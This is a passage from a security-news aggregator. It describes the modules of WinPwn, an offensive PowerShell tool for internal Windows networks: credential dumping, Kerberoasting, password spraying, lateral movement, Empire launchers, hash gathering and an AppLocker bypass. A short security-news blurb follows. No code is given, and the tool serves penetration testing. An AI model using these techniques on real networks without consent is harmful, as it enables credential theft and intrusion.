https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray) Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump) lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne) latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here. empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire) shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit) groupsearch -> Get-DomainGPOUserLocalGroupMapping – find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking isadmin -> Checks for local admin access on the local system Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard) The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack).Todo:Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.Proxy Options via PAC-File are not correctly found in the moment.Legal disclaimer:Usage of WinPwn for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

ASUS, Microsoft, & Tesla – Hack Naked News #212

    Zero-Days in Counter Strike client could be used to build a major botnet, huge aluminum plants hit by ‘severe’ ransomware attack, Myspace loses 50 million songs in server migration, wifi signals can reveal your password, and PuTTY in your hands: an SSH client gets patched after RSA key exchange memory vulnerability was spotted! […]
The post ASUS, Microsoft, & Tesla – Hack Naked News #212 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/VrsX9vpaVWg/